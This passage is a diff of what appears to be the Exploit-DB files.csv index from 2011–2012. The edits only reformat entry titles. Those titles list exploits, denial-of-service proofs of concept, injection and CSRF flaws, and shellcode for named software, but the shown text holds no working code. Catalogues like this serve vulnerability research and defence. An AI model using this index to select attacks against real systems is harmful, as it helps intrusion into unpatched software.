- SQL Injection vulnerability",2011-10-10,"Stefan Schurtz",php,webapps,0 +17952,platforms/php/webapps/17952.txt,"KaiBB 2.0.1 - SQL Injection Vulnerability",2011-10-10,"Stefan Schurtz",php,webapps,0 17955,platforms/php/webapps/17955.txt,"Filmis 0.2 Beta Multiple Vulnerabilities",2011-10-10,M.Jock3R,php,webapps,0 17956,platforms/php/webapps/17956.txt,"6kbbs Multiple Vulnerabilities",2011-10-10,"labs insight",php,webapps,0 17957,platforms/php/webapps/17957.txt,"RoundCube 0.3.1 XRF/SQL injection",2011-10-10,"Smith Falcon",php,webapps,0 @@ -15614,7 +15614,7 @@ id,file,description,date,author,platform,type,port 18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0 18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0 18019,platforms/windows/dos/18019.txt,"Google Chrome PoC, killing thread",2011-10-22,pigtail23,windows,dos,0 -18020,platforms/php/webapps/18020.txt,"jara 1.6 - SQL Injection vulnerability",2011-10-23,muuratsalo,php,webapps,0 +18020,platforms/php/webapps/18020.txt,"jara 1.6 - SQL Injection Vulnerability",2011-10-23,muuratsalo,php,webapps,0 18021,platforms/php/webapps/18021.php,"phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection Exploit",2011-10-23,EgiX,php,webapps,0 18022,platforms/php/webapps/18022.txt,"InverseFlow 2.4 - CSRF Vulnerabilities (Add Admin User)",2011-10-23,"EjRaM HaCkEr",php,webapps,0 18023,platforms/php/webapps/18023.java,"phpLDAPadmin 0.9.4b DoS",2011-10-23,Alguien,php,webapps,0 @@ -15637,7 +15637,7 @@ id,file,description,date,author,platform,type,port 18043,platforms/windows/dos/18043.py,"GFI Faxmaker Fax Viewer 10.0 [build 237] - DoS (Poc).",2011-10-28,loneferret,windows,dos,0 18045,platforms/php/webapps/18045.txt,"PHP Photo Album <= 0.4.1.16 - Multiple Disclosure Vulnerabilities",2011-10-29,"BHG Security Center",php,webapps,0 18046,platforms/php/webapps/18046.txt,"Barter Sites 1.3 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 -18047,platforms/php/webapps/18047.txt,"JEEMA SMS 3.2 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 +18047,platforms/php/webapps/18047.txt,"JEEMA Sms 3.2 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18048,platforms/php/webapps/18048.txt,"Vik Real Estate 1.0 Joomla Component Multiple Vulnerabilities",2011-10-29,"Chris Russell",php,webapps,0 18049,platforms/windows/dos/18049.txt,"Microsys PROMOTIC 8.1.4 ActiveX GetPromoticSite Unitialized Pointer",2011-10-13,"Luigi Auriemma",windows,dos,0 18050,platforms/php/webapps/18050.txt,"Joomla HM-Community (com_hmcommunity) Multiple Vulnerabilities",2011-10-31,"599eme Man",php,webapps,0 @@ -15664,16 +15664,16 @@ id,file,description,date,author,platform,type,port 18076,platforms/php/webapps/18076.txt,"Advanced Poll 2.02 SQL Injection Vulnerability",2011-11-04,"Yassin Aboukir",php,webapps,0 18077,platforms/windows/webapps/18077.txt,"hp data protector media operations <= 6.20 - Directory Traversal",2011-11-04,"Luigi Auriemma",windows,webapps,0 18078,platforms/windows/dos/18078.txt,"Microsoft Excel 2003 11.8335.8333 Use After Free",2011-11-04,"Luigi Auriemma",windows,dos,0 -18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 +18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 -18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 +18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit",2011-11-04,metasploit,windows,local,0 18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader Local Root",2011-11-05,zx2c4,linux,local,0 18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0 -18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 +18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit - DEP Bypass",2011-11-07,pasta,windows,remote,0 18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 18091,platforms/php/webapps/18091.txt,"OrderSys <= 1.6.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 @@ -15683,12 +15683,12 @@ id,file,description,date,author,platform,type,port 18096,platforms/windows/local/18096.py,"Aviosoft Digital TV Player Professional 1.x Stack Buffer Overflow",2011-11-09,modpr0be,windows,local,0 18099,platforms/php/webapps/18099.txt,"osCSS2 ""_ID"" parameter Local file inclusion",2011-11-09,"Stefan Schurtz",php,webapps,0 18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 -18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 +18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 - 2.2.10 Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - DoS",2011-11-11,swami,windows,dos,0 -18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 Remote Command Execution",2011-11-13,metasploit,php,webapps,0 +18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,metasploit,php,webapps,0 18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 Stack Buffer Overflow",2011-11-13,metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 18111,platforms/php/webapps/18111.php,"Wordpress Zingiri Plugin <= 2.2.3 (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 @@ -15705,7 +15705,7 @@ id,file,description,date,author,platform,type,port 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection Vulnerability",2011-11-16,"Asheesh kumar",hardware,webapps,0 18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control",2011-11-17,metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 -18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading vulnerability",2011-11-19,metasploit,windows,remote,0 +18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading Vulnerability",2011-11-19,metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection Vulnerability",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer calendar <= 1.01 SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp <= 1.6 - SQL Injection Vulnerability",2011-11-19,muuratsalo,php,webapps,0 @@ -15733,7 +15733,7 @@ id,file,description,date,author,platform,type,port 18164,platforms/android/webapps/18164.php,"Android 'content://' URI - Multiple Information Disclosure Vulnerabilities",2011-11-28,"Thomas Cannon",android,webapps,0 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 -18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin 0day",2011-11-28,Alberto_García_Illera,php,webapps,0 +18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0day)",2011-11-28,Alberto_García_Illera,php,webapps,0 18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,metasploit,multiple,remote,0 18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 and 4300 Command Execution",2011-11-30,metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow Vulnerability",2011-11-30,Silent_Dream,windows,dos,0 @@ -15745,7 +15745,7 @@ id,file,description,date,author,platform,type,port 18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit",2011-12-01,kingcope,freebsd,remote,0 18182,platforms/windows/remote/18182.txt,"Serv-U FTP Jail Break",2011-12-01,kingcope,windows,remote,0 18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer Remote Stack BoF",2011-12-01,"Nick Freeman",windows,remote,0 -18184,platforms/windows/local/18184.rb,"Final Draft 8 Multiple Stack Buffer Overflows",2011-12-01,"Nick Freeman",windows,local,0 +18184,platforms/windows/local/18184.rb,"Final Draft 8 - Multiple Stack Buffer Overflows",2011-12-01,"Nick Freeman",windows,local,0 18185,platforms/php/webapps/18185.txt,"Muster Render Farm Management System Arbitrary File Download",2011-12-01,"Nick Freeman",php,webapps,0 18186,platforms/windows/local/18186.rb,"StoryBoard Quick 6 Stack Buffer Overflow",2011-12-01,"Nick Freeman",windows,local,0 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 @@ -15761,7 +15761,7 @@ id,file,description,date,author,platform,type,port 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 Remote reboot/shutdown/reset (DoS)",2011-12-05,rigan,hardware,dos,0 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 -18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' SQL-Injection vulnerability",2011-12-05,"Stefan Schurtz",php,webapps,0 +18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' SQL-Injection Vulnerability",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,metasploit,php,webapps,0 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 @@ -15775,14 +15775,14 @@ id,file,description,date,author,platform,type,port 18221,platforms/linux/dos/18221.c,"Apache HTTP Server Denial of Service",2011-12-09,"Ramon de C Valle",linux,dos,0 18222,platforms/php/webapps/18222.txt,"SePortal 2.5 - SQL Injection",2011-12-09,Don,php,webapps,0 18223,platforms/windows/dos/18223.pl,"Free Opener Local Denial of Service",2011-12-09,"Iolo Morganwg",windows,dos,0 -18224,platforms/php/webapps/18224.php,"Docebo LMS <= 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 +18224,platforms/php/webapps/18224.php,"Docebo Lms <= 4.0.4 - (messages) Remote Code Execution",2011-12-09,mr_me,php,webapps,0 18225,platforms/linux/dos/18225.c,"CSF Firewall Buffer Overflow",2011-12-09,"FoX HaCkEr",linux,dos,0 18226,platforms/linux_mips/shellcode/18226.c,"Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.",2011-12-10,rigan,linux_mips,shellcode,0 18227,platforms/linux_mips/shellcode/18227.c,"Linux/MIPS - reboot() - 32 bytes.",2011-12-10,rigan,linux_mips,shellcode,0 18228,platforms/linux/local/18228.sh,"Acpid 1:2.0.10-1ubuntu2 Privilege Boundary Crossing Vulnerability",2011-12-10,otr,linux,local,0 -18230,platforms/php/webapps/18230.txt,"FCMS_2.7.2 cms and earlier multiple stored XSS Vulnerability",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 +18230,platforms/php/webapps/18230.txt,"FCMS <= 2.7.2 CMS - Multiple Stored XSS Vulnerability",2011-12-10,"Ahmed Elhady Mohamed",php,webapps,0 18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0 -18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 +18232,platforms/php/webapps/18232.txt,"FCMS <= 2.7.2 CMS - Multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 @@ -15817,7 +15817,7 @@ id,file,description,date,author,platform,type,port 18277,platforms/php/webapps/18277.txt,"Free Image Hosting Script Arbitrary File Upload Vulnerability",2011-12-26,ySecurity,php,webapps,0 18278,platforms/linux/dos/18278.txt,"Nagios Plugin check_ups Local Buffer Overflow PoC",2011-12-26,"Stefan Schurtz",linux,dos,0 18280,platforms/linux/remote/18280.c,"Telnetd encrypt_keyid: Remote Root function pointer overwrite",2011-12-26,"NighterMan and BatchDrake",linux,remote,0 -18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 Universal exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0 +18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 Universal Exploit metasploit",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18285,platforms/windows/dos/18285.py,"VLC 1.1.11 (libav) libavcodec_plugin.dll DoS",2011-12-28,"Mitchell Adair",windows,dos,0 18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod SQL Injection Vulnerability",2011-12-29,snup,php,webapps,0 @@ -15861,7 +15861,7 @@ id,file,description,date,author,platform,type,port 18351,platforms/netware/dos/18351.txt,"Novell Netware XNFS caller_name xdrDecodeString Remote Code Execution",2012-01-10,"Francis Provencher",netware,dos,0 18352,platforms/php/webapps/18352.txt,"YABSoft Advanced Image Hosting Script SQL Injection Vulnerability",2012-01-12,"Robert Cooper",php,webapps,0 18353,platforms/php/webapps/18353.txt,"WordPress wp-autoyoutube plugin Blind SQL Injection Vulnerability",2012-01-12,longrifle0x,php,webapps,0 -18354,platforms/windows/remote/18354.py,"WorldMail imapd 3.0 SEH overflow (egg hunter)",2012-01-12,TheXero,windows,remote,0 +18354,platforms/windows/remote/18354.py,"WorldMail imapd 3.0 SEH Overflow (egg hunter)",2012-01-12,TheXero,windows,remote,0 18355,platforms/php/webapps/18355.txt,"Wordpress Count-per-day plugin Multiple Vulnerabilities",2012-01-12,6Scan,php,webapps,0 18356,platforms/php/webapps/18356.txt,"Tine 2.0 - Maischa Multiple Cross Site Scripting Vulnerabilities",2012-01-13,Vulnerability-Lab,php,webapps,0 18357,platforms/php/webapps/18357.txt,"Pragyan CMS 2.6.1 - Arbitrary File Upload Vulnerability",2012-01-13,Dr.KroOoZ,php,webapps,0 @@ -15877,7 +15877,7 @@ id,file,description,date,author,platform,type,port 18374,platforms/php/webapps/18374.txt,"PHPDomainRegister 0.4a-RC2-dev - Multiple Vulnerabilities",2012-01-16,Or4nG.M4N,php,webapps,0 18375,platforms/windows/local/18375.rb,"BS.Player 2.57 Buffer Overflow Exploit (Unicode SEH)",2012-01-17,metasploit,windows,local,0 18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 -18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 mChannel use after free vulnerability",2012-01-17,metasploit,osx,remote,0 +18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 mChannel use after free Vulnerability",2012-01-17,metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 Search For php,html Writable Files and Add Your Code",2012-01-17,rigan,lin_x86,shellcode,0 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 @@ -15909,9 +15909,9 @@ id,file,description,date,author,platform,type,port 18413,platforms/php/webapps/18413.txt,"SpamTitan Application 5.08x - SQL Injection Vulnerability",2012-01-23,Vulnerability-Lab,php,webapps,0 18416,platforms/jsp/webapps/18416.txt,"stoneware webnetwork6 - Multiple Vulnerabilities",2012-01-24,"Jacob Holcomb",jsp,webapps,0 18417,platforms/php/webapps/18417.txt,"wordpress <= 3.3.1 - Multiple Vulnerabilities",2012-01-25,"Trustwave's SpiderLabs",php,webapps,0 -18418,platforms/php/webapps/18418.html,"VR GPub 4.0 CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 +18418,platforms/php/webapps/18418.html,"VR GPub 4.0 - CSRF Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18419,platforms/php/webapps/18419.html,"phplist 2.10.9 - CSRF/XSS Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 -18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 Create Folder Remote Code Exec BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0 +18420,platforms/windows/remote/18420.rb,"Sysax Multi Server 5.50 - Create Folder Remote Code Execution BoF (MSF Module)",2012-01-26,"Craig Freyman",windows,remote,0 18422,platforms/php/webapps/18422.txt,"Peel SHOPPING 2.8& 2.9 - XSS/SQL Injections Vulnerability",2012-01-26,Cyber-Crystal,php,webapps,0 18423,platforms/windows/remote/18423.rb,"HP Diagnostics Server magentservice.exe Overflow",2012-01-27,metasploit,windows,remote,0 18424,platforms/php/webapps/18424.rb,"vBSEO <= 3.6.0 ""proc_deutf()"" Remote PHP Code Injection Exploit",2012-01-27,EgiX,php,webapps,0 @@ -15937,7 +15937,7 @@ id,file,description,date,author,platform,type,port 18447,platforms/asp/webapps/18447.txt,"MailEnable Webmail Cross-Site Scripting Vulnerability",2012-01-13,"Sajjad Pourali",asp,webapps,0 18448,platforms/windows/remote/18448.rb,"Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57",2012-02-02,metasploit,windows,remote,0 18449,platforms/windows/remote/18449.rb,"Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute",2012-02-02,metasploit,windows,remote,0 -18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 Multiple Persistent XSS Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 +18451,platforms/windows/webapps/18451.txt,"Sphinix Mobile Web Server 3.1.2.47 - Multiple Persistent XSS Vulnerabilities",2012-02-02,"SecPod Research",windows,webapps,0 18452,platforms/multiple/webapps/18452.txt,"Apache Struts Multiple Persistent Cross-Site Scripting Vulnerabilities",2012-02-02,"SecPod Research",multiple,webapps,0 18453,platforms/windows/dos/18453.txt,"OfficeSIP Server 3.1 - Denial of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 18454,platforms/windows/dos/18454.txt,"NetSarang Xlpd Printer Daemon 4 Denial of Service Vulnerability",2012-02-02,"SecPod Research",windows,dos,0 @@ -15946,16 +15946,16 @@ id,file,description,date,author,platform,type,port 18457,platforms/linux/dos/18457.py,"torrent-stats httpd.c Denial of Service",2012-02-03,otr,linux,dos,0 18458,platforms/php/dos/18458.txt,"PHP 5.4SVN-2012-02-03 htmlspecialchars/entities Buffer Overflow",2012-02-03,cataphract,php,dos,0 18460,platforms/php/dos/18460.php,"PHP 5.4.0RC6 (64-bit) - Denial of Service",2012-02-04,"Stefan Esser",php,dos,0 -18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 ActiveX buffer overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 +18461,platforms/windows/dos/18461.html,"Edraw Diagram Component 5 ActiveX Buffer Overflow DoS",2012-02-04,"Senator of Pirates",windows,dos,0 18463,platforms/windows/dos/18463.html,"PDF Viewer Component ActiveX DoS",2012-02-05,"Senator of Pirates",windows,dos,0 18464,platforms/php/webapps/18464.html,"GAzie <= 5.20 Cross Site Request Forgery",2012-02-05,"Giuseppe D'Inverno",php,webapps,0 18465,platforms/php/webapps/18465.txt,"BASE 1.4.5 (base_qry_main.php t_view) SQL Injection Vulnerability",2012-02-06,"a.kadir altan",php,webapps,0 18466,platforms/php/webapps/18466.txt,"Tube Ace(Adult PHP Tube Script) SQL Injection",2012-02-06,"Daniel Godoy",php,webapps,0 18467,platforms/php/webapps/18467.txt,"XRayCMS 1.1.1 - SQL Injection Vulnerability",2012-02-06,chap0,php,webapps,0 -18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 CSRF Vulnerability",2012-02-07,"Vaibhav Gupta",php,webapps,0 -18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 Multiple Commands DoS",2012-02-07,"Balazs Makany",windows,dos,0 +18468,platforms/php/webapps/18468.html,"Flyspray 0.9.9.6 - CSRF Vulnerability",2012-02-07,"Vaibhav Gupta",php,webapps,0 +18469,platforms/windows/dos/18469.pl,"Typsoft FTP Server 1.10 - Multiple Commands DoS",2012-02-07,"Balazs Makany",windows,dos,0 18470,platforms/php/webapps/18470.txt,"Ananta Gazelle CMS - Update Statement SQL Injection",2012-02-08,hackme,php,webapps,0 -18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml buffer overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 +18471,platforms/windows/local/18471.c,"TORCS <= 1.3.2 xml Buffer Overflow /SAFESEH evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 18473,platforms/multiple/webapps/18473.txt,"Cyberoam Central Console 2.00.2 - File Include Vulnerability",2012-02-08,Vulnerability-Lab,multiple,webapps,0 18475,platforms/windows/dos/18475.c,"PeerBlock 1.1 BSOD",2012-02-09,shinnai,windows,dos,0 18476,platforms/windows/remote/18476.py,"Sysax Multi Server <= 5.52 File Rename BoF RCE (Egghunter)",2012-02-09,"Craig Freyman",windows,remote,0 @@ -15972,21 +15972,21 @@ id,file,description,date,author,platform,type,port 18491,platforms/windows/dos/18491.txt,"xnview <= 1.98.5 - Multiple Vulnerabilities",2012-02-16,"Luigi Auriemma",windows,dos,0 18492,platforms/linux/remote/18492.rb,"Horde 3.3.12 Backdoor Arbitrary PHP Code Execution",2012-02-17,metasploit,linux,remote,0 18493,platforms/windows/dos/18493.py,"PCAnywhere 12.5.0 build 463 Denial of Service",2012-02-17,"Johnathan Norman",windows,dos,0 -18494,platforms/php/webapps/18494.txt,"Pandora FMS 4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 +18494,platforms/php/webapps/18494.txt,"Pandora Fms 4.0.1 - Local File Include Vulnerability",2012-02-17,Vulnerability-Lab,php,webapps,0 18495,platforms/php/webapps/18495.html,"almnzm 2.4 - CSRF Vulnerability (Add Admin)",2012-02-18,"HaNniBaL KsA",php,webapps,0 18497,platforms/php/webapps/18497.txt,"4PSA CMS SQL Injection Vulnerabilities",2012-02-19,"BHG Security Center",php,webapps,0 -18498,platforms/php/webapps/18498.html,"SyndeoCMS <= 3.0 CSRF Vulnerability",2012-02-19,"Ivano Binetti",php,webapps,0 +18498,platforms/php/webapps/18498.html,"SyndeoCMS <= 3.0 - CSRF Vulnerability",2012-02-19,"Ivano Binetti",php,webapps,0 18499,platforms/hardware/webapps/18499.txt,"D-Link DSL-2640B (ADSL Router) CSRF Vulnerability",2012-02-20,"Ivano Binetti",hardware,webapps,0 18500,platforms/windows/local/18500.py,"Blade API Monitor Unicode Bypass (Serial Number BOF)",2012-02-20,b33f,windows,local,0 18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 SEH Exploit MSF",2012-02-20,Death-Shadow-Dark,windows,local,0 -18502,platforms/php/webapps/18502.html,"PlumeCMS <= 1.2.4 CSRF Vulnerability",2012-02-20,"Ivano Binetti",php,webapps,0 +18502,platforms/php/webapps/18502.html,"PlumeCMS <= 1.2.4 - CSRF Vulnerability",2012-02-20,"Ivano Binetti",php,webapps,0 18503,platforms/hardware/webapps/18503.txt,"Cisco Linksys WAG54GS CSRF Change Admin Password",2012-02-21,"Ivano Binetti",hardware,webapps,0 -18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 CSRF Vulnerability (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 +18504,platforms/hardware/webapps/18504.txt,"Sagem F@ST 2604 - CSRF Vulnerability (ADSL Router)",2012-02-22,"KinG Of PiraTeS",hardware,webapps,0 18506,platforms/php/webapps/18506.txt,"BRIM < 2.0.0 - SQL Injection",2012-02-22,ifnull,php,webapps,0 18507,platforms/windows/dos/18507.py,"DAMN Hash Calculator 1.5.1 - Local Heap Overflow PoC",2012-02-22,"Julien Ahrens",windows,dos,0 18508,platforms/php/webapps/18508.txt,"Limesurvey (PHPSurveyor 1.91+ stable) Blind SQL Injection",2012-02-22,TorTukiTu,php,webapps,0 18509,platforms/hardware/webapps/18509.html,"Dlink DCS series CSRF Change Admin Password",2012-02-22,rigan,hardware,webapps,0 -18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 +18510,platforms/windows/webapps/18510.txt,"webcamxp and webcam 7 - Directory Traversal Vulnerability",2012-02-22,Silent_Dream,windows,webapps,0 18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18512,platforms/windows/dos/18512.txt,"Unity 3D Web Player <= 3.2.0.61061 Denial of Service",2012-02-22,"Luigi Auriemma",windows,dos,0 18513,platforms/php/webapps/18513.txt,"DFLabs PTK <= 1.0.5 - Multiple Vulnerabilities (Steal Authentication Credentials)",2012-02-22,"Ivano Binetti",php,webapps,0 @@ -16002,12 +16002,12 @@ id,file,description,date,author,platform,type,port 18523,platforms/php/webapps/18523.txt,"webgrind 1.0 (file param) Local File Inclusion Vulnerability",2012-02-25,LiquidWorm,php,webapps,0 18524,platforms/windows/dos/18524.py,"Tiny HTTP Server <= 1.1.9 - Remote Crash PoC",2012-02-25,localh0t,windows,dos,0 18526,platforms/php/webapps/18526.php,"YVS Image Gallery SQL Injection",2012-02-25,CorryL,php,webapps,0 -18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 +18527,platforms/php/webapps/18527.txt,"ContaoCMS (aka TYPOlight) <= 2.11 - CSRF (Delete Admin - Delete Article)",2012-02-26,"Ivano Binetti",php,webapps,0 18531,platforms/windows/remote/18531.html,"Mozilla Firefox Firefox 4.0.1 Array.reduceRight() Exploit",2012-02-27,pa_kt,windows,remote,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow Vulnerability",2012-02-27,Vulnerability-Lab,windows,local,0 18534,platforms/windows/remote/18534.py,"Sysax Multi 